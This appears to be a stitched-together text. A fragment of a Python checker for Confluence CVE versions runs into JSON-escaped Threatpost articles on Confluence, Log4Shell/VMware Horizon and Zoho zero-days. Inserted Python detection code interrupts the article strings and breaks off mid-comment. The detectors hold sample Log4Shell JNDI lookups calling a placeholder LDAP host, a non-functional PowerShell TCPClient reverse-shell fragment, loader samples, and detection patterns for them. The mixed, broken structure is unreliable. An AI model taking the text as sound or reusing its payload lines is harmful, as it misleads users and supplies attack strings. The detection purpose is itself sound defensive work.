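    ((6, 14, 0), (7, 4, 11)),
    ((7, 5, 0), (7, 11, 6)),
    ((7, 12, 0), (7, 12, 5)),
]

# CVE-2022-26134: first fixed release of each supported line, from the article.
CVE_2022_26134_FIXED = {
    (7, 4): (7, 4, 17), (7, 13): (7, 13, 7), (7, 14): (7, 14, 3),
    (7, 15): (7, 15, 2), (7, 16): (7, 16, 4), (7, 17): (7, 17, 4),
    (7, 18): (7, 18, 1),
}


def vulnerable_to_2021_26084(version: str) -> bool:
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in CVE_2021_26084_RANGES)


def vulnerable_to_2022_26134(version: str) -> bool:
    """Assumption made by this example (consistent with 'all versions after
    1.3.0 are affected'): a build is safe only at or above the fixed release
    of its own line; a line with no fixed release (e.g. 7.5 to 7.12) counts as
    vulnerable and needs an upgrade to a fixed line."""
    v = parse_version(version)
    if v <= (1, 3, 0):
        return False
    fixed = CVE_2022_26134_FIXED.get(v[:2])
    return fixed is None or v < fixed


def assess(version: str) -> dict:
    """Both verdicts for one version string."""
    return {
        'version': version,
        'CVE-2021-26084': vulnerable_to_2021_26084(version),
        'CVE-2022-26134': vulnerable_to_2022_26134(version),
    }


if __name__ == '__main__':
    for ver in ('6.13.22', '7.4.10', '7.11.6', '7.13.0', '7.18.0', '7.18.1'):
        print(assess(ver))
```

Note that a build like 7.13.0, which the 2021 article lists as a fixed release, is still flagged for the 2022 flaw, which is the point of keeping the two checks separate.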
OGNL is an expression language for getting and setting properties of Java objects; when attacker-controlled input is evaluated as an OGNL expression, it can be used to run arbitrary Java code.\n\nIn some cases, an unauthenticated attacker could execute arbitrary code on a computer running a Confluence Server or Data Center instance \u2013 which earned the issue a critical 9.8 out of 10 rating on the CVSS vulnerability-rating scale.\n\n\u201cIf the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems,\u201d [explained](<https://unit42.paloaltonetworks.com/cve-2021-26084/>) researchers at Palo Alto Networks, who also confirmed the exploitation activity.\n\nKaspersky researchers explained that the vulnerability is only usable for unauthenticated RCE if the option \u201cAllow people to sign up to create their account\u201d is active.\n\n\u201cSeveral proof-of-concepts for exploiting it, including a version that permits RCE, are already available online,\u201d Kaspersky noted [in its writeup](<https://www.kaspersky.com/blog/confluence-server-cve-2021-26084/41635/>), issued Monday.\n\nAtlassian [has released](<https://www.atlassian.com/software/confluence/download-archives>) fixed versions 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. The bug doesn\u2019t affect Confluence Cloud users.\n\n## **Atlassian\u2019s Summer of Security Woes**\n\nIn July, Atlassian patched a serious flaw in its Jira platform, which is a proprietary bug-tracking and agile project-management tool used for software development. 
It\u2019s often tied to the Confluence platform through single sign-on (SSO) capabilities ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)).\n\nThe issue, tracked as CVE-2020-36239, could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products, thanks to a missing authentication check in Jira\u2019s implementation of Ehcache, an open-source Java distributed cache for general-purpose caching.\n\n\u201cCVE-2020-36239 can be remotely exploited to achieve arbitrary code execution and will likely be of great interest to both cybercriminals and nation-state-associated actors,\u201d Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, [said at the time](<https://threatpost.com/atlassian-critical-jira-flaw/168053/>). He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds \u201cknown to be used by a diverse client base.\u201d\n\nEarlier, in June, researchers uncovered a chain of Atlassian bugs that [could be tied together](<https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/>) for one-click information disclosure from Jira accounts. Sensitive information could have been easily siphoned out of the platform, researchers at Check Point Research said: \u201cAnything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n", "cvss3": {}, "published": "2021-09-07T16:07:58", "type": "threatpost", "title": "Jenkins Hit as Atlassian Confluence Cyberattacks Widen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-36239", "CVE-2021-26084"], "modified": "2021-09-07T16:07:58", "id": "THREATPOST:042D7C606FEB056B462B0BFB61E59917", "href": "https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T20:34:59", "description": "What researchers are calling a \u201chorde\u201d of miner bots and backdoors are using the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.\n\nOn Tuesday, Sophos [reported](<https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/>) that the remote code execution (RCE) Log4j vulnerability in the ubiquitous Java logging library is under active attack, \u201cparticularly 
among cryptocurrency mining bots.\u201d Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are the work of [initial access brokers](<https://threatpost.com/zebra2104-initial-access-broker-malware-apts/176075/>) (IABs), which could lay the groundwork for later ransomware infections.\n\n## History of Log4Shell Nightmare-ware\n\nThe Log4j flaw was discovered in December 2021, vigorously attacked within hours of its discovery and subsequently dubbed Log4Shell. Sophos\u2019s findings about VMware Horizon servers being besieged by threat actors leveraging the bug are in keeping with what\u2019s been happening since then: In fact, cyberattacks [increased](<https://threatpost.com/cyber-spike-attacks-high-log4j/177481/>) 50 percent YoY in 2021, peaking in December, due to a frenzy of Log4j exploits.\n\nWith [millions](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) of Log4j-targeted attacks clocking in per hour since the flaw\u2019s [discovery](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>), within just a few weeks there was a record-breaking peak of 925 cyberattacks per week per organization, globally, as Check Point Research (CPR) [reported](<https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/>) in early January.\n\nLog4Shell has been a nightmare for organizations to hunt down and remediate, given that the flaw affected hundreds of software products, \u201cmaking it difficult for some organizations to assess their exposure,\u201d noted Sophos researchers Gabor Szappanos and Sean Gallagher in Tuesday\u2019s report. 
In other words, some outfits don\u2019t necessarily know if they\u2019re vulnerable.\n\n## Why Attackers Have Zeroed in on Horizon\n\nIn particular, those attacks have included ones targeting vulnerable [VMware Horizon](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) servers: a platform that serves up virtual desktops and apps across the hybrid cloud. These servers have been important tools in organizations\u2019 arsenals over the past few years, given that the pandemic triggered the necessity to provide work-from-home tools, the researchers pointed out.\n\nAlthough VMware [released](<https://kb.vmware.com/s/article/87073>) patched versions of Horizon earlier this month \u2013 on March 8 \u2013 many organizations may not have been able to deploy the patched version or apply workarounds, if they even know that they\u2019re vulnerable to begin with.\n\n\u201cAttempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,\u201d Sophos said.\n\nEven those organizations that have applied the patches or workarounds may already have been compromised before they did so, given the backdoors and reverse-shell activity Sophos has tracked, the researchers cautioned; patching closes the door but does not evict an attacker who is already inside.\n\nIn late December and January, VMware\u2019s Horizon servers with Log4Shell vulnerabilities came under [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) attack, as [flagged](<https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike>) by researchers at Huntress. 
Other [attacks](<https://twitter.com/GossiTheDog/status/1484145056198053891>) included those that [installed web shells](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nThose attacks used Log4j\u2019s JNDI lookup feature to fetch, over the Lightweight Directory Access Protocol (LDAP), a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VMware Blast Secure Gateway service and thereby granting attackers remote access and code execution. Sophos has seen these attacks show up in customer telemetry since the beginning of January, the researchers said.\n\nThe attacks against Horizon servers grew throughout January. Beyond attempts to deploy cryptocurrency-mining malware, other attacks were potentially designed either to grant threat actors initial access or to infect targets with ransomware, Sophos said. Such attacks have continued into this month: the security firm shared a bar chart showing the ebb and flow of the attacks, which have bled into mid-March.\n\nVMware Horizon server attacks since the beginning of January. Source: Sophos.\n\n\u201cThe largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing,\u201d the researchers said.\n\nBut this wave hasn\u2019t relied on one of cybercrooks\u2019 favorite tools, Cobalt Strike: a commercial penetration-testing tool that can be used to deploy beacons on systems in order to simulate attacks and test network defenses.\n\nRather, \u201cthe cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server,\u201d Sophos said, with the most frequently used server in the campaigns being 80.71.158.96.\n\n## The Payloads\n\nSophos found a slew of miners being dumped on targeted Horizon servers, including z0Miner, the JavaX miner and at least two variants \u2013 the Jin and Mimu cryptocurrency miner bots \u2013 of the open-source XMRig cryptominer. Speaking of which, Uptycs reported in January that cryptojackers had figured out how to [inject XMRig](<https://threatpost.com/cybercriminals-vmware-vsphere-cryptominers/177722/>) into VMware\u2019s vSphere services, undetected. For its part, back in September 2021, Trend Micro [found](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) that z0Miner operators were exploiting the [Atlassian Confluence RCE](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) (CVE-2021-26084) for cryptojacking attacks.\n\nSophos also found several backdoors, some of them legitimate testing tools. One was Sliver, an implant used by red teams and penetration testers to emulate adversary tactics. Sliver showed up as a precursor to the Jin miner in all the cases where Sophos was able to investigate further, leading the researchers to suspect that it\u2019s actually the payload. 
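The JNDI lookup abuse described above, and the URL-path OGNL injection used against Confluence in CVE-2022-26134 earlier on this page, both leave a `${...}` expression in web server access logs, usually URL-encoded and, in the Log4Shell case, often wrapped in nested lookups that hide the literal string `jndi`. The Python below is an added example, not Sophos's or Threatpost's detection logic: it normalizes a log line (repeated URL decoding, then collapsing Log4j's `${lower:…}`, `${upper:…}` and `${…:-x}` tricks), classifies what remains, and runs over a handful of log lines that are constructed here with placeholder addresses. The OGNL sample is a harmless placeholder expression, not an exploit payload.

```python
import re
from urllib.parse import unquote

# Innermost ${...} with no nested expression inside it.
INNER = re.compile(r'\$\{([^${}]*)\}')
# A Log4j JNDI lookup, after de-obfuscation.
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.I)
# ${(...)}, ${#...}, ${@...} and the #{ / %{ forms: OGNL rather than a Log4j lookup.
EXPR = re.compile(r'[$#%]\{\s*[(#@]')


def deobfuscate(text: str, max_rounds: int = 10) -> str:
    """Collapse the Log4j lookup tricks used to hide the literal 'jndi':
    ${lower:J} -> j, ${upper:n} -> N, ${::-d} -> d, ${env:NOPE:-i} -> i.
    Innermost expressions that are not such tricks (the jndi lookup itself,
    an OGNL expression) are left alone, so the loop always terminates."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            body = m.group(1)
            low = body.lower()
            if low.startswith('lower:'):
                changed = True
                return body[6:].lower()
            if low.startswith('upper:'):
                changed = True
                return body[6:].upper()
            if ':-' in body:                 # default-value syntax ${key:-default}
                changed = True
                return body.rsplit(':-', 1)[1]
            return m.group(0)

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def normalize(text: str, max_rounds: int = 3) -> str:
    """URL-decode until stable (attackers double-encode), then collapse lookups."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return deobfuscate(text)


def classify(line: str):
    """'jndi-lookup', 'ognl-expression' or None for one raw log line."""
    norm = normalize(line)
    if JNDI.search(norm):
        return 'jndi-lookup'
    if EXPR.search(norm):
        return 'ognl-expression'
    return None


def scan_log(lines):
    """(line number, verdict) for every line that carries an injected expression."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits


# Constructed combined-format log lines with placeholder addresses (not real telemetry).
SAMPLE_LOG = [
    '198.51.100.10 - - [19/Jan/2022:08:00:01 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # CVE-2022-26134 style: a URL-encoded ${...} expression as the URI path (harmless placeholder expression)
    '203.0.113.7 - - [03/Jun/2022:10:01:13 +0000] "GET /%24%7B%28%23a%3D1%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.79.1"',
    # Log4Shell style: nested lookups hide 'jndi', and the whole thing is double-encoded
    '203.0.113.9 - - [19/Jan/2022:08:00:05 +0000] "GET /portal/?x=%2524%257B%2524%257Blower%253Aj%257Dndi%253Aldap%253A%252F%252F198.51.100.5%253A1389%252Fa%257D HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
    # Log4Shell style in the User-Agent, using the default-value trick
    '203.0.113.9 - - [19/Jan/2022:08:00:06 +0000] "GET /portal/ HTTP/1.1" 200 812 "-" "${${::-j}ndi:ldap://198.51.100.5:1389/a}"',
]

if __name__ == '__main__':
    for n, verdict in scan_log(SAMPLE_LOG):
        print(n, verdict)
```

Scanning the whole line rather than only the request path matters for Log4Shell, because any logged header (User-Agent, X-Forwarded-For) is a viable injection point.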
Either that, or the actor behind Sliver might be a ransomware gang, the researchers hypothesized, given that the same servers deploying Sliver also hosted files to deliver the Atera agent as a payload.\n\nAtera is another common, legitimate remote monitoring and management tool. However, the threat actors aren\u2019t attacking existing Atera installations, per se, the researchers said. Rather, \u201cthey install their own Atera agents in order to use the Atera cloud management infrastructure to deploy additional payloads in the future,\u201d they explained.\n\nSophos also found the legitimate Splashtop Streamer remote-access tool being downloaded and installed on infected systems, \u201cprobably as an automated task for the new clients.\u201d\n\nAs well, there were several PowerShell-based reverse shells in the payload mix that had been dropped by the Log4Shell exploits.\n\n## Two Types of Reverse Shells\n\nSophos found two types of reverse shell. One is a shorter script that opens a socket connection to a remote server and executes whatever buffer it receives, which is expected to be a PowerShell command.\n\nThe other is a larger variant that can reflectively load a Windows binary, with the loader carried as an encrypted, base64-encoded blob, as shown in a screenshot in the report.\n\nBase64 encoded blob. Source: Sophos.\n\nSophos telemetry showed that while z0Miner, JavaX and some other payloads were downloaded directly by the web shells that had been used for initial compromise, the Jin bots were tied to use of Sliver and used the same wallets as Mimo, \u201csuggesting these three malware were used by the same actor,\u201d Sophos said. Researchers believe that Jin is, in fact, \u201csimply a rebranded version of Mimo.\u201d\n\n## Loads of New Malware Loaders\n\nNew malware loaders are springing up like dandelions in the spring. 
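The two PowerShell reverse-shell variants just described (a socket reader that executes what it receives, and a loader carrying a base64 blob) are typically launched from an encoded command line, so a first-pass detection can work from the process command line alone. The Python below is an added example, not Sophos's code or detection logic: it decodes a `-EncodedCommand` argument (base64 of UTF-16LE), looks for long base64 literals handed to `FromBase64String`, checks whether they decode to a PE (`MZ`) header, and tags socket-plus-`iex` and `[Reflection.Assembly]::Load` patterns. The sample command lines are constructed; the shell fragment is deliberately incomplete and non-functional. An encrypted blob, like the one Sophos describes, will not trip the `MZ` check, which is why the loader call itself is tagged as well.

```python
import base64
import re

# Argument forms PowerShell accepts for an encoded command (it prefix-matches).
ENC_ARG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)
# A long base64 literal passed to [Convert]::FromBase64String(...)
B64_LITERAL = re.compile(r'''FromBase64String\(\s*['"]([A-Za-z0-9+/=]{64,})['"]''', re.I)
EXEC_CALL = re.compile(r'\b(?:iex|invoke-expression)\b', re.I)


def encode_ps(script: str) -> str:
    """Encode a script the way 'powershell -EncodedCommand' expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode('utf-16le')).decode('ascii')


def decode_encoded_command(b64: str) -> str:
    """Reverse of encode_ps; returns '' if the argument is not a valid encoded command."""
    try:
        return base64.b64decode(b64, validate=True).decode('utf-16le')
    except (ValueError, UnicodeDecodeError):
        return ''


def analyze(cmdline: str) -> dict:
    """Return the decoded script (if any) and an ordered list of indicator tags."""
    tags = []
    text = cmdline
    decoded = ''
    m = ENC_ARG.search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded:
            tags.append('encoded-command')
            text = cmdline + ' ' + decoded      # scan the visible and the decoded part
    blobs = B64_LITERAL.findall(text)
    if blobs:
        tags.append('inline-base64-blob')
        for blob in blobs:
            try:
                raw = base64.b64decode(blob, validate=True)
            except ValueError:
                continue
            if raw.startswith(b'MZ'):            # unencrypted PE image embedded in the script
                tags.append('embedded-pe')
                break
    low = text.lower()
    if 'net.sockets.tcpclient' in low and EXEC_CALL.search(low):
        tags.append('reverse-shell')
    if '[reflection.assembly]::load' in low:
        tags.append('reflective-loader')
    return {'decoded': decoded, 'tags': tags}


# Constructed samples (placeholders, not Sophos telemetry). The shell fragment is
# deliberately incomplete and non-functional.
SHELL_FRAGMENT = ("$c=New-Object Net.Sockets.TCPClient('198.51.100.5',4444);"
                  "$s=$c.GetStream();<read loop omitted>;iex $data")
FAKE_PE = base64.b64encode(b'MZ' + b'\x90' * 100).decode('ascii')
SAMPLES = {
    'benign': 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"',
    'encoded_shell': 'powershell.exe -nop -w hidden -enc ' + encode_ps(SHELL_FRAGMENT),
    'loader': ('powershell.exe -c "$b=[Convert]::FromBase64String(\'' + FAKE_PE +
               '\'); [Reflection.Assembly]::Load($b)"'),
}

if __name__ == '__main__':
    for name, cmd in SAMPLES.items():
        print(name, analyze(cmd)['tags'])
```

In production this would run over Sysmon event 1 or Security event 4688 command lines, or over PowerShell script-block logs (event 4104), where the decoded text is already available.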
Besides the ones covered by Sophos in Tuesday\u2019s report, security researchers at Symantec today also published a technical[ report](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUeZY5vOK6hHL-2FZQIhe5-2B4JVOehUh4Rb8p3ey37Q9OVEIiWGDSjejxPvkb8ovY0h-2FaWB9dvcXCl3SBCFSEuV5tcRGFsPYlsbDvD-2BUBbuZrpjG-2F3o76yv-2FjW7fnR-2BbuAqcTKlC8Ql3vteVWIz1-2F4jQ39BlDgn8Ze7x-2FjjxdfusIUCoWeHw_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksSSNzbmCCaVViVDpzZ8413vH2SK7hoc-2F9PgDFHE5nPDuAWqJnV7-2B1m3omM9hPkKC6f0TGhlnK7L2Rm0UV3m4RfnEylMOpa8zOk3ZpTlH4NHB441qOzaGmeusjrgk12h1-2FHBCuMABwcfwmdXp6d8OUxE-3D>) on a new malware loader tracked as Verblecon that\u2019s escaped detection due to the polymorphic nature of its code.\n\nVerblecon has likewise been seen in attacks that install cryptocurrency miners on compromised machines.\n\nSaryu Nayyar, CEO and founder of[ Gurucul](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUemyDumHlbVHpjKINAYc3Jk-3DThvL_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksRzfCH77Y1C4pRGOycTIJafHsN-2B4KnSygPf4489ZnosIN0CloPhQCESwF4k9NfwdKmZsgKHx6JGWXjEVL3UpRuh84NABjevUYJLlxFeyFD2KR14VLhnCySOfOl1QNCbp-2F2Vu3lWjuUOLb0td2Dh5r3I-3D>), told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it\u2019s also \u201ccritical\u201d to employ sophisticated technologies \u2013 namely, self-training machine learning and behavioral models \u2013 to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.\n\n\u201cCurrent [extended 
detection and response, or XDR] and traditional [security information and event management, or SIEM] solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods,\u201d she told Threatpost via email. \u201cOrganizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.\u201d\n\nChris Olson, CEO of digital safety platform The Media Trust, told Threatpost on Tuesday that polymorphic techniques \u201care just another way to hide malicious intentions, along with checks for security tools and live environments.\u201d\n\nThis attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0, he said via email.\n\n\u201cToday\u2019s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos,\u201d Olson said.\n\nTo prevent that from happening, we must learn from our past mistakes, he warned. \u201cToday\u2019s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design \u2013 otherwise, the same issues will replicate themselves with greater potency than ever.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T20:33:08", "type": "threatpost", "title": "Log4JShell Used to Swarm VMware Servers with Miners, Backdoors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false,
 "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2022-03-29T20:33:08", "id": "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "href": "https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T15:34:54", "description": "A critical security vulnerability in the Zoho ManageEngine ADSelfService Plus platform could allow remote attackers to bypass authentication and have 
free rein across users\u2019 Active Directory (AD) and cloud accounts.\n\nThe issue (CVE-2021-40539) has been actively exploited in the wild as a zero-day, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nZoho issued a patch on Tuesday, and CISA [warned that](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>) admins should not only apply it immediately, but also ensure in general that ADSelfService Plus is not directly accessible from the internet. The issue affects builds 6113 and below (the fixed version is 6114).\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe Zoho ManageEngine ADSelfService Plus is a self-service password management and single sign-on (SSO) solution for AD and cloud apps, meaning that any cyberattacker able to take control of the platform would have multiple pivot points into both mission-critical apps (and their sensitive data) and other parts of the corporate network via AD. It is, in other words, a powerful, highly privileged application which can act as a convenient point-of-entry to areas deep inside an enterprise\u2019s footprint, for both users and attackers alike.\n\n\u201cUltimately, this underscores the threat posed to internet-facing applications,\u201d Matt Dahl, principal intelligence analyst for Crowdstrike, [noted](<https://twitter.com/voodoodahl1/status/1435673342925737991>). \u201cThese don\u2019t always get the same attention as exploit docs with decoy content, but the variety of these web-facing services gives actors lots of options.\u201d\n\nThis isn\u2019t Zoho\u2019s first zero-day rodeo. 
In March 2020, [researchers disclosed](<https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/>) a zero-day vulnerability in Zoho\u2019s ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones and more from a central location. The critical bug ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>), with a CVSS score of 9.8) allowed an unauthenticated, remote attacker to gain complete control over affected systems \u2013 \u201cbasically the worst it gets,\u201d researchers said at the time.\n\n## **Authentication Bypass and RCE**\n\nThe issue at hand is an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus, which could lead to remote code execution (RCE), according to Zoho\u2019s [knowledge-base advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>).\n\n\u201cThis vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request,\u201d according to the firm. \u201cThis would allow the attacker to carry out subsequent attacks resulting in RCE.\u201d\n\nEchoing CISA\u2019s assessment, Zoho also noted that \u201cWe are noticing indications of this vulnerability being exploited.\u201d The firm characterized the issue as \u201ccritical\u201d although a CVSS vulnerability-severity rating has not yet been calculated for the bug.\n\nFurther technical details are for now scant (and no public exploit code appears to be making the rounds \u2014 yet), but Dahl noted that the zero-day attacks have been going on for quite some time:\n\n> Observed exploitation of this vuln _before_ CVE-2021-26084 (Atlassian Confluence) which got a lot of attention last week. 
Some very general observations:\n> \n> 1/ <https://t.co/rIfxxeBlmO>\n> \n> \u2014 Matt Dahl (@voodoodahl1) [September 8, 2021](<https://twitter.com/voodoodahl1/status/1435673338693754886?ref_src=twsrc%5Etfw>)\n\nHowever, he said that the attacks have thus far been highly targeted and limited, and possibly the work of a single (unknown, for now) actor.\n\n\u201cActor(s) appeared to have a clear objective with ability to get in and get out quickly,\u201d he tweeted.\n\nHe also noted similarities to the attacks taking place on Atlassian Confluence instances (CVE-2021-26084), which also started out as limited and targeted. However, in that case, researchers were able to \u201crapidly produce\u201d a PoC exploit, he pointed out, and eventually there was proliferation to multiple targeted-intrusion actors, usually resulting in cryptomining activity ([as seen in](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) the recent Jenkins attack).\n\nAtlassian Confluence, like AD SelfService Plus, allows centralized access to a raft of sensitive corporate information, being a collaboration platform where business teams can organize their work in one place.\n\n## How to Know if Zoho AD SelfService Plus Has Been Compromised\n\nUsers can tell if they\u2019ve been affected by checking the \\ManageEngine\\ADSelfService Plus\\logs folder to see if the following strings are found in the access log entries:\n\n * /RestAPI/LogonCustomization\n * /RestAPI/Connection\n\nZoho also said that the presence of the following files in the ADSelfService Plus installation folder may indicate that the instance has been compromised:\n\n * A .cer file in the \\ManageEngine\\ADSelfService Plus\\bin folder.\n * A .jsp file in the \\ManageEngine\\ADSelfService Plus\\help\\admin-guide\\Reports folder.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. 
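A scanner for the two access-log indicators listed above, as an added example; it is not Zoho's or Threatpost's code. It parses entries in a Tomcat/Apache-style combined log format, which is an assumption about the ADSelfService Plus access-log layout, so adjust `LOG_LINE` to match the real files under \ManageEngine\ADSelfService Plus\logs; the file-name glob in `scan_log_dir` is likewise an assumption. The sample entries are constructed, not real traffic. The scanner strips query strings before matching, treats the two indicator strings as path prefixes (the exploit may append further segments), counts hits per source address, and reports lines it could not parse, so a format mismatch does not silently produce zero hits.

```python
"""Hunt for CVE-2021-40539 exploitation indicators in ADSelfService Plus access logs.

Added example (not from the Threatpost article or Zoho's advisory). It scans
access-log entries for the two REST API paths Zoho lists as indicators:
/RestAPI/LogonCustomization and /RestAPI/Connection. The log-line layout below
is an assumption (Tomcat/Apache-style access log); adjust LOG_LINE to match the
real files under \\ManageEngine\\ADSelfService Plus\\logs.
"""
import re
from collections import defaultdict
from pathlib import Path

INDICATOR_PATHS = ("/RestAPI/LogonCustomization", "/RestAPI/Connection")

# Assumed layout: client-ip ident user [timestamp] "METHOD path HTTP/x" status size
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return the parsed fields of one access-log entry, or None if it does not match."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string before matching
    return rec


def is_indicator(path):
    # Prefix match: the indicator strings are paths, and the exploit may append
    # further segments to them.
    return any(path.startswith(p) for p in INDICATOR_PATHS)


def scan_lines(lines):
    """Scan log entries; return hits, a per-source-IP hit count and the unparsed-line count."""
    hits, by_ip, unparsed = [], defaultdict(int), 0
    for line in lines:
        rec = parse_line(line.rstrip("\n"))
        if rec is None:
            unparsed += 1
            continue
        if is_indicator(rec["path"]):
            hits.append(rec)
            by_ip[rec["ip"]] += 1
    return {"hits": hits, "by_ip": dict(by_ip), "unparsed": unparsed}


def scan_log_dir(log_dir, pattern="*.txt"):
    """Read every file matching `pattern` (an assumed name) in the logs folder and scan it."""
    lines = []
    for f in sorted(Path(log_dir).glob(pattern)):
        lines.extend(f.read_text(errors="replace").splitlines())
    return scan_lines(lines)


# Constructed sample entries (not real log data). 203.0.113.7 hits both indicator
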